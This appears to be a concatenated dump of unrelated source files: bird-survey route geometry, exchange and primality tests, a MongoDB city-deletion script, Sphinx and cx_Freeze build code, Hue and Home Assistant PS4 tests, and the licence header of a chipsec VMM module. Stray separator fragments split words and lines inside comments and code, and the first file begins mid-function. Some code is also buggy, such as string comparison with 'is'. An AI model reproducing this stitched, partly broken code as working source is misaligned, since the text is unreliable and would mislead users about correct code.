for i in range(len(pts)):
x, y = pts[i]
lon, lat = prj.transform(inProj, outProj, x, y)
new_pts[i] = (lon, lat)
return new_pts
def calc_len(self):
"""
Calculate total length, segment length, x/y displacement of
each segment along the route.
"""
if self.rating is 'broken':
print('ERROR: Cannot calculate length for broken route')
exit(1)
# python list of lengths of segments (between stops)
segments = np.zeros((len(self.path) - 1))
dxy = np.zeros((len(self.path) - 1, 2))
total_len = 0.0
for i in range(1, len(self.path)):
# !!! Only apply to EPSG:5070
# !!! Poor man's method to calc distance between two points
# !!! TODO: change to advanced method to handle different
# !!! projections
p0 = self.path[i - 1]
p1 = self.path[i]
d = np.linalg.norm(p1 - p0)
dxy[i - 1] = p1 - p0
segments[i - 1] = d
total_len += d
return total_len, segments, dxy
def calc_stop(self):
"""
Calculate 50 stops along a BBS route.
"""
if self.rating is 'broken':
print('ERROR: Cannot calculate stops for broken route')
exit(1)
# calculate total path length and generate a list of segment lengths
length, segments, dxy = self.calc_len()
#
# TODO: check if calculated length matched by published data
#
# hard-coded number of stops
nstop = 50
# use the starting point as first stop
stops = np.zeros((50, 2))
stops[0] = self.path[0]
k = 1
# distance between each stop, more or less 800 meters
# TODO: warning if the value not close to 800 meters
# TODO: handle other projections (?)
dstop = length / (nstop - 1)
# "trip" counts how many meters traveled since the last stop
trip = 0.0
for i in range(len(segments)):
seg = trip + segments[i]
# the fraction of two parts that are split by the stop in the
# current segments, used to linearly interpolate stop coordinates
frac = 0.0
while seg >= dstop:
frac += (dstop - trip)
stops[k] = self.path[i] + frac / segments[i] * dxy[i]
k = k + 1
seg -= dstop
trip = 0.0
trip = seg
# handle the last stop
if k == nstop - 1:
stops[-1] = self.path[-1]
elif k < nstop - 1:
# TODO: is this necessary?
print('!!! %d - %s: Not enough stops found, k = %d'
% (self.id, self.name, k))
elif k > nstop:
# TODO: is this necessary?
print('!!! %d - %s: More stops found, k = %d'
% (self.id, self.name, k))
return stops, dstop
def summary(self):
"""
Summary string for print and export
"""
return '%d\t%d\t%s\t%d\t%s\t%f\t%s\n' % (
self.id, self.stateID, states_by_id[self.stateID].name,
self.routeID, self.name, self.length, self.rating
)
def export(self):
"""
Export route information to a CSV file.
"""
if self.rating is 'broken':
print('ERROR: exporting broken route')
exit(1)
with open('rte_' + str(self.id) + '.csv', 'w') as f:
f.write('sep=\t\n')
|
Honzin/ccs | tests/testAdapter/testOkcoincom/testTrades.py | Python | agpl-3.0 | 1,366 | 0.004392 | import unittest
import ccs
import time
####################################################################################################################
# OKCOINCOM #
####################################################################################################################
class Valid(unittest.TestCase):
    """Smoke tests for the OkCoin.com trades adapter.

    setUp calls ccs.trades() directly (note the commented-out rate-limit
    sleep), so these tests appear to hit the live service -- TODO confirm.
    The empty test methods at the bottom are placeholders.
    """
    def setUp(self):
        self.stock = ccs.constants.OKCOINCOM
        self.base = ccs.constants.BTC
        self.quote = ccs.constants.USD
        self.trades = ccs.trades(self.stock, self.base, self.quote)
        # Response module providing the Trade wrapper class.
        self.m = ccs.okcoincom.public.response
        #time.sleep(3)
    def testLen(self):
        """len() of the trades container must be an int."""
        self.assertIsInstance(len(self.trades), int)
    def testGetItem(self):
        """Indexing must yield Trade objects."""
        self.assertIsInstance(self.trades[0], self.m.Trade)
    def testStock(self):
        self.assertEqual(self.trades.stock(), self.stock)
    def testMethod(self):
        self.assertEqual(self.trades.method(), ccs.constants.TRADES)
    def testUsymbol(self):
        """Unified symbol is "<base>:<quote>"."""
        self.assertEqual(self.trades.usymbol(), self.base + ":" + self.quote)
    def testOsymbol(self):
        pass  # TODO: not implemented yet
    def testData(self):
        pass  # TODO: not implemented yet
    def testRaw(self):
        pass  # TODO: not implemented yet
    def testStr(self):
        pass  # TODO: not implemented yet
# Allow running this module directly as a test script.
if __name__ == '__main__':
    unittest.main()
|
marcosfede/algorithms | maths/prime_test.py | Python | gpl-3.0 | 1,595 | 0 | """
prime_test(n) returns a True if n is a prime number else it returns False
"""
import unittest
def prime_test(n):
    """Primality check via 6k +/- 1 trial division.

    Returns True when ``n`` is prime, False otherwise.  After the small
    cases (n <= 1, the primes 2 and 3, and multiples of 2 or 3), every
    remaining prime candidate has the form 6k - 1 or 6k + 1, so only
    divisors of that shape up to sqrt(n) need to be tried.
    """
    if n <= 1:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    divisor = 5
    while divisor * divisor <= n:
        if n % divisor == 0 or n % (divisor + 2) == 0:
            return False
        divisor += 6
    return True
def prime_test2(n):
    """Primality check by trial division over 2..int(sqrt(n)).

    Returns True when ``n`` is prime, False otherwise.  Numbers not
    greater than 1 are rejected up front; a composite number must have
    a factor no larger than its integer square root.

    Cleanup: removed the commented-out debug prints and flattened the
    if/else nesting into a guard clause plus an ``all()`` scan.
    """
    # Primes are greater than 1 by definition.
    if n <= 1:
        return False
    # No divisor up to sqrt(n) means n is prime.
    return all(n % i != 0 for i in range(2, int(n ** 0.5) + 1))
class TestSuite(unittest.TestCase):
    """Cross-checks both primality implementations against the known
    count of primes in [2, 100] (there are exactly 25)."""

    def test_prime_test(self):
        """prime_test must identify exactly the 25 primes in [2, 100]."""
        counter = 0
        for i in range(2, 101):
            if prime_test(i):
                counter += 1
        self.assertEqual(25, counter)

    def test_prime_test2(self):
        """prime_test2 must identify exactly the 25 primes in [2, 100].

        Bug fix: this test previously called prime_test again, so
        prime_test2 was never exercised at all.
        """
        counter = 0
        for i in range(2, 101):
            if prime_test2(i):
                counter += 1
        self.assertEqual(25, counter)
# Run the unittest suite when executed as a script.
if __name__ == "__main__":
    unittest.main()
|
pwldp/rodzice-na-czasie-pl | server/source_data/deleteCitiesWithoutSchool.py | Python | gpl-3.0 | 434 | 0.009217 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import os.path
import sys
import time
#
from slughifi import *
import xlrd
#
from rncMongoDriver import rncMongoDB
#
#
#
#
| #
# Entry point: connect to the production MongoDB and delete every city
# document whose has_school flag is False.
if __name__ == "__main__":
    # NOTE(review): 'uuuuu:ppppp' look like placeholder credentials and
    # '127.0.1' is a loopback shorthand address -- confirm before running.
    dburi = 'mongodb://uuuuu:ppppp@127.0.1:27017/rnc_production'
    rncdb = rncMongoDB(dburi,"rnc_production")
    print rncdb
    #
    collCities = rncdb.mongoDB["cities"]
    # remove() deletes all documents matching the filter in one call.
    collCities.remove({"has_school":False})
#
# EOF
# |
tyrog236/site-perso | docs/conf.py | Python | mit | 7,708 | 0.007525 | # -*- coding: utf-8 -*-
#
# sammy documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 17 11:46:20 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sammy'
copyright = u'2014, ChangeMyName'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = | '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_ | use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sammydoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sammy.tex', u'sammy Documentation',
u'ChangeToMyName', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sammy', u'sammy Documentation',
[u'ChangeToMyName'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sammy', u'sammy Documentation',
u'ChangeToMyName', 'sammy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
vmanoria/bluemix-hue-filebrowser | hue-3.8.1-bluemix/desktop/libs/hadoop/src/hadoop/yarn/tests.py | Python | gpl-2.0 | 1,708 | 0.002342 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache Li | cense, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License | for the specific language governing permissions and
# limitations under the License.
import logging
from nose.tools import assert_true, assert_equal, assert_not_equal
from hadoop.yarn import clients
LOG = logging.getLogger(__name__)
def test_get_log_client():
    """Exercise the bounded log-client cache in hadoop.yarn.clients.

    With MAX_HEAP_SIZE forced to 2:
      * different hosts yield different client objects,
      * re-requesting a cached link returns the same object,
      * adding a third host keeps the heap at its cap of 2 entries.
    The original MAX_HEAP_SIZE is restored even if an assertion fails.
    """
    old_max_heap_size = clients.MAX_HEAP_SIZE
    # Shrink the cache so eviction is observable with just 3 links.
    clients.MAX_HEAP_SIZE = 2
    try:
        log_link1 = "http://test1:8041/container/nonsense"
        log_link2 = "http://test2:8041/container/nonsense"
        log_link3 = "http://test3:8041/container/nonsense"
        c1 = clients.get_log_client(log_link1)
        c2 = clients.get_log_client(log_link2)
        assert_not_equal(c1, c2)
        # The same link must be served from the cache.
        assert_equal(c1, clients.get_log_client(log_link1))
        clients.get_log_client(log_link3)
        assert_equal(2, len(clients._log_client_heap))
        base_urls = [tup[1].base_url for tup in clients._log_client_heap]
        # test1 was refreshed above and test3 was just added, so test2's
        # client is the one evicted -- consistent with least-recently-used
        # behaviour (NOTE(review): inferred from these asserts; clients'
        # implementation is not visible here).
        assert_true('http://test1:8041' in base_urls)
        assert_true('http://test3:8041' in base_urls)
    finally:
        clients.MAX_HEAP_SIZE = old_max_heap_size
|
jnewland/home-assistant | tests/components/ps4/test_config_flow.py | Python | apache-2.0 | 14,315 | 0 | """Define tests for the PlayStation 4 config flow."""
from unittest.mock import patch
from homeassistant import data_entry_flow
from homeassistant.components import ps4
from homeassistant.components.ps4.const import (
DEFAULT_NAME, DEFAULT_REGION)
from homeassistant.const import (
CONF_CODE, CONF_HOST, CONF_IP_ADDRESS, CONF_NAME, CONF_REGION, CONF_TOKEN)
from homeassistant.util import location
from tests.common import MockConfigEntry
# Fixture values shared by the config-flow tests below.
MOCK_TITLE = 'PlayStation 4'
MOCK_CODE = '12345678'
MOCK_CREDS = '000aa000'
MOCK_HOST = '192.0.0.0'
MOCK_HOST_ADDITIONAL = '192.0.0.1'
# Device entries as stored in a config entry's 'devices' list.
MOCK_DEVICE = {
    CONF_HOST: MOCK_HOST,
    CONF_NAME: DEFAULT_NAME,
    CONF_REGION: DEFAULT_REGION
}
MOCK_DEVICE_ADDITIONAL = {
    CONF_HOST: MOCK_HOST_ADDITIONAL,
    CONF_NAME: DEFAULT_NAME,
    CONF_REGION: DEFAULT_REGION
}
# User input submitted during the 'link' step (device plus PIN code).
MOCK_CONFIG = {
    CONF_IP_ADDRESS: MOCK_HOST,
    CONF_NAME: DEFAULT_NAME,
    CONF_REGION: DEFAULT_REGION,
    CONF_CODE: MOCK_CODE
}
MOCK_CONFIG_ADDITIONAL = {
    CONF_IP_ADDRESS: MOCK_HOST_ADDITIONAL,
    CONF_NAME: DEFAULT_NAME,
    CONF_REGION: DEFAULT_REGION,
    CONF_CODE: MOCK_CODE
}
# Payload shape of a created config entry.
MOCK_DATA = {
    CONF_TOKEN: MOCK_CREDS,
    'devices': [MOCK_DEVICE]
}
MOCK_UDP_PORT = int(987)
MOCK_TCP_PORT = int(997)
# Selections for the 'mode' step of the flow.
MOCK_AUTO = {"Config Mode": 'Auto Discover'}
MOCK_MANUAL = {"Config Mode": 'Manual Entry', CONF_IP_ADDRESS: MOCK_HOST}
# Positional args presumably follow LocationInfo's declared field order
# (ip, country code/name, region code/name, city, zip, time zone,
# latitude, longitude, uses_metric) -- TODO confirm against
# homeassistant.util.location.
MOCK_LOCATION = location.LocationInfo(
    '0.0.0.0', 'US', 'United States', 'CA', 'California',
    'San Diego', '92122', 'America/Los_Angeles', 32.8594,
    -117.2073, True)
async def test_full_flow_implementation(hass):
    """Walk the full user -> creds -> mode -> link flow to a created entry.

    All pyps4_homeassistant.Helper network calls are patched out, so the
    flow logic runs without touching a real console or network.
    """
    flow = ps4.PlayStation4FlowHandler()
    flow.hass = hass
    flow.location = MOCK_LOCATION
    manager = hass.config_entries
    # User Step Started, results in Step Creds
    with patch('pyps4_homeassistant.Helper.port_bind',
               return_value=None):
        result = await flow.async_step_user()
    assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
    assert result['step_id'] == 'creds'
    # Step Creds results with form in Step Mode.
    with patch('pyps4_homeassistant.Helper.get_creds',
               return_value=MOCK_CREDS):
        result = await flow.async_step_creds({})
    assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
    assert result['step_id'] == 'mode'
    # Step Mode with User Input which is not manual, results in Step Link.
    with patch('pyps4_homeassistant.Helper.has_devices',
               return_value=[{'host-ip': MOCK_HOST}]):
        result = await flow.async_step_mode(MOCK_AUTO)
    assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
    assert result['step_id'] == 'link'
    # User Input results in created entry.
    with patch('pyps4_homeassistant.Helper.link',
               return_value=(True, True)), \
            patch('pyps4_homeassistant.Helper.has_devices',
                  return_value=[{'host-ip': MOCK_HOST}]):
        result = await flow.async_step_link(MOCK_CONFIG)
    assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert result['data'][CONF_TOKEN] == MOCK_CREDS
    assert result['data']['devices'] == [MOCK_DEVICE]
    assert result['title'] == MOCK_TITLE
    await hass.async_block_till_done()
    # Add entry using result data.
    mock_data = {
        CONF_TOKEN: result['data'][CONF_TOKEN],
        'devices': result['data']['devices']}
    entry = MockConfigEntry(domain=ps4.DOMAIN, data=mock_data)
    entry.add_to_manager(manager)
    # Check if entry exists.
    assert len(manager.async_entries()) == 1
    # Check if there is a device config in entry.
    assert len(entry.data['devices']) == 1
async def test_multiple_flow_implementation(hass):
"""Test multiple device flows."""
flow = ps4.PlayStation4FlowHandler()
flow.hass = hass
flow.location = MOCK_LOCATION
manager = hass.config_entries
# User Step Started, results in Step Creds
with patch('pyps4_homeassistant.Helper.port_bind',
return_value=None):
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'creds'
# Step Creds results with form in Step Mode.
with patch('pyps4_homeassistant.Helper.get_creds',
return_value=MOCK_CREDS):
result = await flow.async_step_creds({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'mode'
# Step Mode with User Input which is not manual, results in Step Link.
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_mode(MOCK_AUTO)
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'link'
# User Input results in created entry.
with patch('pyps4_homeassistant.Helper.link',
return_value=(True, True)), \
patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_link(MOCK_CONFIG)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data'][CONF_TOKEN] == MOCK_CREDS
assert result['data']['devices'] == [MOCK_DEVICE]
assert result['title'] == MOCK_TITLE
await hass.async_block_till_done()
# Add entry using result data.
mock_data = {
CONF_TOKEN: result['data'][CONF_TOKEN],
'devices': result['data']['devices']}
entry = MockConfigEntry(domain=ps4.DOMAIN, data=mock_data)
entry.add_to_manager(manager)
# Check if entry exists.
assert len(manager.async_entries()) == 1
# Check if there is a device config in entry.
assert len(entry.data['devices']) == 1
# Test additional flow.
# User Step Started, results in Step Mode:
with patch('pyps4_homeassistant.Helper.port_bind',
return_value=None), \
patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'creds'
# Step Creds results with form in Step Mode.
with patch('pyps4_homeassistant.Helper.get_creds',
return_value=MOCK_CREDS):
result = await flow.async_step_creds({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'mode'
# Step Mode with User Input which is not manual, results in Step Link.
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]):
result = await flow.async_step_mode(MOCK_AUTO)
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'link'
# Step Link
with patch('pyps4_homeassistant.Helper.has_devices',
return_value=[{'host-ip': MOCK_HOST},
{'host-ip': MOCK_HOST_ADDITIONAL}]), \
patch('pyps4_homeassistant.Helper.link',
return_value=(True, True)):
result = await flow.async_step_link(MOCK_CONFIG_ADDITIONAL)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data'][CONF_TOKEN] == MOCK_CREDS
assert len(result['data']['devices']) == 1
assert result['title'] == MOCK_TITLE
await hass.async_block_till_done()
mock_data = {
CONF_TOKEN: result['data'][CONF_TOKEN],
'devices': result['data']['devices']}
# Update config entries with result data
entry = MockConfigEntry(domain=ps4.DOMAIN, data=mock_data)
entry.add_to_manager(manager)
manager.async_update_entry(entry)
# Check if there are 2 entries.
assert len(manager.async_entries()) == 2
# Check if there is device config in e |
mysociety/yournextmp-popit | candidates/migrations/0014_make_extra_slugs_unique.py | Python | agpl-3.0 | 789 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Schema migration: make the slug fields of OrganizationExtra,
    PartySet and PostExtra unique at the database level.

    Auto-generated by Django; do not edit the operations by hand once
    the migration has been applied anywhere.
    """
    dependencies = [
        ('candidates', '0013_remove_max_popit_ids'),
    ]
    operations = [
        # organizationextra.slug: unique, may be blank.
        migrations.AlterField(
            model_name='organizationextra',
            name='slug',
            field=models.CharField(unique=True, max_length=256, blank=True),
        ),
        # partyset.slug: unique, required.
        migrations.AlterField(
            model_name='partyset',
            name='slug',
            field=models.CharField(unique=True, max_length=256),
        ),
        # postextra.slug: unique, may be blank.
        migrations.AlterField(
            model_name='postextra',
            name='slug',
            field=models.CharField(unique=True, max_length=256, blank=True),
        ),
    ]
|
ssdi-drive/nuxeo-drive | nx_cx_Freeze/__init__.py | Python | lgpl-2.1 | 6,744 | 0.000445 | # coding: utf-8
"""
cx_Freeze extension
Extends:
- the 'build' command with the 'exe-command' option to allow using a
different command from 'build_exe' to build executables from Python scripts.
- the 'install' command with the 'skip-sub-commands' option to allow not
running a set of sub commands, e.g.:
install --skip-sub-commands=install_lib,install_scripts,install_data
- the 'bdist_msi' command to handle LaunchAfterInstall and a clean uninstall.
"""
from __future__ import unicode_literals
import distutils.command.build
import os
import sys
from cx_Freeze.dist import _AddCommandClass, build as cx_build, \
install as cx_install, setup as cx_setup
class build(cx_build):
    """'build' command that can delegate executable creation to a
    configurable sub-command (--exe-command, default 'build_exe')."""

    # Register the extra command-line option on cx_Freeze's build
    # command once, at class-definition time.
    cx_build.user_options.append(
        ('exe-command=', None, 'Python script executables command'))

    def initialize_options(self):
        """Default to cx_Freeze's standard 'build_exe' sub-command."""
        cx_build.initialize_options(self)
        self.exe_command = 'build_exe'

    def get_sub_commands(self):
        """Return distutils' sub-commands, plus the executable command
        when the distribution actually declares executables."""
        commands = distutils.command.build.build.get_sub_commands(self)
        if self.distribution.executables:
            commands.append(self.exe_command)
        return commands
class install(cx_install):
    """'install' command accepting --skip-sub-commands, a comma-separated
    list of sub-commands that must not be run (e.g. install_lib)."""

    cx_install.user_options.append(
        ('skip-sub-commands=', None,
         'sub commands to ignore when running command'))

    def initialize_options(self):
        """By default no sub-command is skipped."""
        cx_install.initialize_options(self)
        self.skip_sub_commands = None

    def get_sub_commands(self):
        """Return cx_Freeze's sub-commands minus the skipped ones."""
        commands = cx_install.get_sub_commands(self)
        if self.skip_sub_commands:
            skipped = self.skip_sub_commands.split(',')
            commands = [cmd for cmd in commands if cmd not in skipped]
        return commands
if sys.platform == 'win32':
    import msilib
    from cx_Freeze.windist import bdist_msi as cx_bdist_msi
    class bdist_msi(cx_bdist_msi):
        """MSI builder extending cx_Freeze's bdist_msi with a licence
        dialog, a control-panel icon and project customization hooks."""
        # Packaging-attributes object; assigned by setup() below before
        # the command runs.
        attribs = None
        initial_target_dir = None
        # Cached licence text (name-mangled; see get_licence()).
        __licence = None
        def finalize_options(self):
            """Derive the default install dir from the platform's
            Program Files folder, then defer to cx_Freeze."""
            self.distribution.get_name()
            if self.initial_target_dir is None:
                if distutils.util.get_platform() == 'win-amd64':
                    program_files_folder = 'ProgramFiles64Folder'
                else:
                    program_files_folder = 'ProgramFilesFolder'
                self.initial_target_dir = r'[%s]\%s' % (
                    program_files_folder, self.attribs.get_install_dir())
            # Using old style class so can't use super
            import cx_Freeze
            cx_Freeze.windist.bdist_msi.finalize_options(self)
        def get_executable(self):
            # Name of the Windows executable produced by the freeze step.
            return self.attribs.get_win_target_name()
        def get_licence(self):
            # Lazily fetch and cache the licence text; None means the
            # installer shows no licence dialog.
            if self.__licence is None:
                self.__licence = self.attribs.get_gpl_licence()
            return self.__licence
        def add_licence_dialog(self):
            """Insert a licence-agreement screen into the install UI;
            'Next' stays disabled until the checkbox is ticked."""
            msilib.add_data(self.db, 'InstallUISequence', [(
                'LicenceDialog', None, 380)])
            dialog = distutils.command.bdist_msi.PyDialog(
                self.db, 'LicenceDialog',
                self.x, self.y, self.width, self.height, self.modal,
                self.title, 'Next', 'Next', 'Cancel')
            dialog.text('LicenseTitle', 15, 10, 320, 20, 0x3, 'License')
            dialog.control(
                'License', 'ScrollableText', 15, 30, 340, 200, 0x7,
                None, self.get_licence(), None, None)
            dialog.control(
                'LicenseAccepted', 'CheckBox', 15, 240, 320, 20, 0x3,
                'LicenseAccepted', 'I have accepted this agreement', None, None)
            button = dialog.cancel('Cancel', 'Next')
            button.event('EndDialog', 'Exit')
            button = dialog.next('Next', 'Cancel', active=False)
            button.condition('Enable', 'LicenseAccepted')
            button.condition('Disable', 'not LicenseAccepted')
            button.event('EndDialog', 'Return')
        def add_exit_dialog(self):
            """Build the final installer screen, inserting the licence
            dialog, custom MSI tweaks and the Add/Remove icon first."""
            # Add the license screen
            if self.get_licence() is not None:
                self.add_licence_dialog()
            # Allow to customize the MSI
            if hasattr(self.attribs, 'customize_msi'):
                self.attribs.customize_msi(self.db)
            # Add the product icon in control panel Install/Remove softwares
            icon_file = os.path.join(self.attribs.get_icons_home(),
                                     self.attribs.get_win_icon())
            if os.path.exists(icon_file):
                msilib.add_data(self.db, 'Property', [
                    ('ARPPRODUCTICON', 'InstallIcon'),
                ])
                msilib.add_data(self.db, 'Icon', [(
                    'InstallIcon', msilib.Binary(icon_file))])
            # Copy/paste from parent's method
            dialog = distutils.command.bdist_msi.PyDialog(
                self.db, 'ExitDialog',
                self.x, self.y, self.width, self.height, self.modal,
                self.title, 'Finish', 'Finish', 'Finish')
            dialog.title('Completing the [ProductName]')
            dialog.back('< Back', 'Finish', active=False)
            dialog.cancel('Cancel', 'Back', active=False)
            dialog.text(
                'Description', 15, 235, 320, 20, 0x30003,
                'Click the Finish button to exit the installer.')
            button = dialog.next('Finish', 'Cancel', name='Finish')
            button.event('EndDialog', 'Return')
        # Dead code intentionally disabled as a bare string literal:
        # a launch-after-install checkbox that never worked as expected.
        """
        Does not work as expected, no more time for that as an icon
        is created on the desktop and in the menu.
        # Launch product checkbox
        msilib.add_data(self.db, 'Property', [(
            'StartClient', '1')])
        c = dialog.control(
            'LaunchAfterInstall', 'CheckBox', 15, 200, 320, 20, 0x3,
            'StartClient', 'Launch [ProductName]', None, None)
        c.condition('Hide', 'Progress1<>"Install"')
        msilib.add_data(self.db, 'CustomAction', [(
            'LaunchNuxeoDrive', 768, 'TARGETDIR', 'start /B %s' % self.get_executable())])
        msilib.add_data(self.db, 'InstallExecuteSequence', [(
            'LaunchNuxeoDrive', 'StartClient=1 and Progress1="Install"', 6600 - 2)])
        """
# Override cx_Freeze setup to override build and install commands.
def setup(**attrs):
    """Drop-in replacement for cx_Freeze's setup().

    Installs the extended 'build' and 'install' commands (and, on
    Windows, the customized 'bdist_msi') into the distribution's
    cmdclass mapping, then delegates to cx_Freeze's setup().
    """
    cmdclass = attrs.setdefault('cmdclass', {})
    _AddCommandClass(cmdclass, 'build', build)
    _AddCommandClass(cmdclass, 'install', install)
    if sys.platform == 'win32':
        # The MSI builder needs the packaging attributes for paths,
        # icon and licence lookups.
        bdist_msi.attribs = attrs.get('attribs')
        _AddCommandClass(cmdclass, 'bdist_msi', bdist_msi)
    cx_setup(**attrs)
|
chipsecintel/chipsec | source/tool/chipsec/modules/tools/vmm/venom.py | Python | gpl-2.0 | 1,660 | 0.021687 | #CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Fou | ndation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public Licens | e for more details.
#
#You should have received a copy of the GNU General Public License
